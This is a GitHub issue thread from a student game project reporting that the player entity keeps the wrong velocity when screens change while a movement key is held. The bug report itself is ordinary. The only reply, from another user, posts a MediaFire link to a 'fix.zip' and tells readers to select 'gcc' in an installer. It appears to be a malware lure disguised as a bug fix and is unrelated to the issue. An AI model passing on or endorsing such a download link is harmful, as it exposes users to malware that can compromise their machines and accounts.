### ISSUE TITLE
Player can have incorrect velocity when entering and exiting screens

### ISSUE THREAD

**Issue by LucasRyall** [UQcsse3200/2024-studio-2#111]
## Description
The player entity can have incorrect velocity values when entering or exiting a screen if the user is already pressing a button (wasd)

## How To Reproduce
Can happen when going in between any 2 screens, but for an example will use going from the main menu to the main game screen.
1. Hold one of the movement buttons, W will be used as an example.
2. Press start game while still holding W
3. release W

The player character now has movement in the direction opposite of the button they were holding, in this case the player moves downwards without any input from the player.

A very similar issue occurs when you exit a screen that you will come back to while holding a button, when you return to that screen (assuming you enter NOT holding the button) the velocity has not been removed. So without any input the player continues to move in the direction they were moving in before leaving the screen.
1. Be in a screen that has a playable entity
2. Hold a movement button, W for example
3. Change screens
4. Release W
5. Return to the first screen
6. the player now has movement (in the positive x direction for this example)

## Expected Behaviour
It is expected that if the user is already holding a button, when entering a screen the player will begin to move.
It is expected that if the user is holding a button when leaving a screen, that the movement does not persist when returning to the screen.

## Additional Context
This is caused by the implementation of movement in the KeyboardPlayerInputComponent class, where pressing W adds velocity in the positive x direction, and releasing adds velocity in the negative x direction.

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
